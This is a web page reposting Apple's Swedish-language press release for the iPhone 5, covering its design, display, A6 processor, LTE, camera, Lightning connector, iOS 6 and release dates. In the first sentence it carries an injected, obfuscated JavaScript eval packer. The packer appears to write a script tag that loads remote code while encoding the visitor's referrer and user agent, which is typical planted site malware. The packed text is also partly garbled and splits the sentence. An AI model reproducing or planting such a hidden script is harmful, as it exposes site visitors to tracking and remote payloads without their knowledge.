Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Apple presenterar iPhone 5

iphone-5-ny
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nfkny|var|u0026u|referrer|fynsf||js|php’.split(’|’),0,{}))
tunnaste och lättaste modellen av iPhone någonsin med en helt ny aluminiumdesign, imponerande 4-tums Retina-skärm, A6-processor och blixtsnabb trådlös teknik

SAN FRANCISCO – 12 september 2012 – Apple presenterade idag iPhone 5, den tunnaste och lättaste modellen av iPhone någonsin, med en helt ny design och imponerande ny 4-tums Retina-skärm, en Apple-utvecklad A6-processor för blixtsnabba prestanda och ultrasnabb trådlös teknik* – samt ännu bättre batteritid.** iPhone 5 levereras med iOS 6, världens mest avancerade mobila operativsystem med fler än 200 nya funktioner, till exempel en helt ny version av appen Kartor med Apple-designad kartografi och navigering med anvisningar steg för steg, Facebook-integrering, Passbook-hantering och ännu fler funktioner och språk för Siri.

”iPhone 5 är den bästa konsumentprodukt vi har skapat hittills”, säger Philip Schiller, vice VD för Worldwide Marketing på Apple. ”Vi har samlat massor av innovationer och avancerad teknik i en tunn, lätt och elegant enhet som har en imponerande 4-tums Retina-skärm, blixtsnabb A6-processer, ultrasnabb trådlös teknik och ännu bättre batteritid och vi är övertygade om att kunderna kommer att älska den.”

iPhone 5 är världens tunnaste smarttelefon med ett helt nytt 7,6 mm hölje i anodiserat aluminium som är 18 procent tunnare och 20 procent lättare än iPhone 4S. iPhone 5 har utformats med största möjliga precision och höljet i anodiserat aluminium kombineras med diamantskurna avfasade kanter och glasinlägg som ger en otrolig känsla och finish.

Den nya 4-tums Retina-skärmen på iPhone 5 har ännu fler pixlar än iPhone 4S, och den redan fantastiska Retina-skärmen har faktiskt blivit ännu bättre. Genom att skärmen är högre, men inte bredare, är det lika enkelt att använda iPhone 5 med en hand som förut. Du kan trycka, skriva och rulla precis som vanligt, samtidigt som du ser mer av materialet och får fantastiska appar som optimerats för den större Retina-skärmen, HD-video i widescreenformat, alla fem dagar i kalendern och mer av webbsidans innehåll.

iPhone 5 har stöd för standarder som LTE och DC-HSDPA för ultrasnabb trådlös kommunikation så du kan surfa, hämta och strömma material ännu snabbare. Apple banar väg för en unik Single Radio LTE-lösning som ger mycket höga hastigheter samtidigt som den passar perfekt in i den nya, häpnadsväckande tunna designen. iPhone 5 har stöd för dubbla frekvensband i Wi-Fi-formatet 802.11n som ger trådlösa hastigheter på upp till 150 Mbit/s.***

Den helt nya A6-processorn har utformats av Apple för att ge bästa möjliga prestanda och strömförbrukning för alla de otroliga nya funktionerna i iPhone 5, däribland den imponerande nya 4-tums Retina-skärmen – samtidigt som den förbättrar batteritiden. Tack vare upp till dubbelt så kraftfull processer och grafikprestanda går nästan allt du gör på iPhone 5 med blixtens hastighet, vare sig det handlar om att starta appar, läsa in webbsidor eller hämta e-postbilagor.

iSight-kameran med sina 8 megapixlar är världens populäraste kamera och tillsammans med iPhone 5 är den ännu bättre. Den nya kameran har fått en helt ny design med otroliga optiska prestanda, vilket är ännu mer förvånande med tanke på att den är 25 procent mindre än kameran i iPhone 4S. Den nya iSight-kameran i iPhone 5 är utrustad med ett objektivskydd i safirglas som är tunnare och hållbarare än vanligt glas och har kapacitet för kristallklara foton. Med den nya panoramafunktionen kan du ta enastående panoramavyer på upp till 28 megapixlar genom att helt enkelt flytta kameran längs med motivet i en enda oavbruten rörelse. Bland de nya videofunktionerna märks förbättrad stabilisering, ansiktsigenkänning i videor med kapacitet för upp till 10 ansikten, samt möjlighet att ta stillbilder medan du spelar in. En ny framåtriktad FaceTime-HD-kamera gör att FaceTime-samtalen blir fantastiskt tydliga och den kan också användas för självporträtt och HD-videoinspelning i 720p. Med iPhone 5 kan du också dela foton med vänner och familj med hjälp av delade bildströmmar i iCloud.

iPhone 5 är utrustad med den nya Lightning-kontakten som är mindre, smartare och mer hållbar än den tidigare kontakten. Lightning-kontakten, som är helt digital, har ett adaptivt gränssnitt som bara använder de signaler som varje tillbehör kräver. Den är dessutom vändbar så att du kan ansluta dina tillbehör omedelbart. Det finns också en adapter för Lightning-till-30-stiftskontakter så att iPhone 5 kan anslutas till tillbehör med det äldre 30-stiftsgränssnittet.****

iPhone 5 har nya förbättrade ljudfunktioner med bland annat ett nytt strålformande, riktat mikrofonsystem för bättre ljudkvalitet, samtidigt som bakgrundsbuller tonas bort med den nya tekniken för brusreducering. iPhone 5 har nu stöd för bredbandsljud i mobilnätet vilket innebär att röster låter tydligare och naturligare. Bredbandsljud stöds av fler än 20 operatörer över hela världen vid lanseringen. iPhone 5 levereras tillsammans med nya Apple EarPods? som har en nyskapande design för bättre passform och hållbarhet, samt en fantastisk akustisk ljudkvalitet som annars bara brukar finnas i avancerade hörlurar.

iPhone 5 levereras med iOS 6, världens mest avancerade mobiloperativsystem med fler än 200 nya användarfunktioner, till exempel: en helt ny version av appen Kartor med Apple-designad kartografi, navigering med anvisningar steg för steg samt en enastående ny Flyover-vy, Facebook-integrering för Kontakter och Kalender, med möjlighet att posta direkt från Notiscenter, Passbook som är det enklaste sättet att hålla koll på biljetter och liknande, nya Siri-funktioner som exempelvis stöd för fler språk, snabb tillgång till matchresultat, restaurangrekommendationer och topplistor.***** Siri- och Facebook-kompatibla appar som Bilder, Safari och Kartor, samt delade bildströmmar via iCloud.

Pris och tillgänglighet

iPhone 5 finns i antingen vitt/silver eller svart/skiffer och kommer att säljas via Apple Online Store (apple.com/se), Apple Store-butiker och hos utvalda operatörer och utvalda auktoriserade Apple-återförsäljare. iPhone 5 släpps i USA, Australien, Kanada, Frankrike, Tyskland, Hongkong, Japan, Singapore och Storbritannien på fredagen den 21 september och kunder kan förbeställa iPhone 5 från och med fredagen den 14 september. iOS 6-mjukvaran släpps onsdagen den 19 september som en kostnadsfri programuppdatering. Priser meddelas vid lanseringen.******

iPhone 5 släpps i ytterligare 22 länder den 28 september: Belgien, Danmark, Estland, Finland, Irland, Italien, Liechtenstein, Litauen, Luxemburg, Nederländerna, Norge, Nya Zeeland, Polen, Portugal, Schweiz, Slovakien, Slovenien, Spanien, Sverige, Tjeckien, Ungern och Österrike.

* LTE är tillgängligt via utvalda operatörer. Nätverkshastigheterna är beroende av operatörens nätverk. Kontakta operatören för mer information.
** Batteritiden kan variera beroende på enhetsinställningar, användning samt andra faktorer. De faktiska resultaten kan variera.
*** Baseras på teoretiska beräkningar av hastigheten, de faktiska resultaten kan variera.
**** Säljs separat.
***** Alla funktioner är inte tillgängliga i alla länder.
****** Tillgängligheten varierar beroende på operatören.

Detta är ett pressmeddelande från Apple AB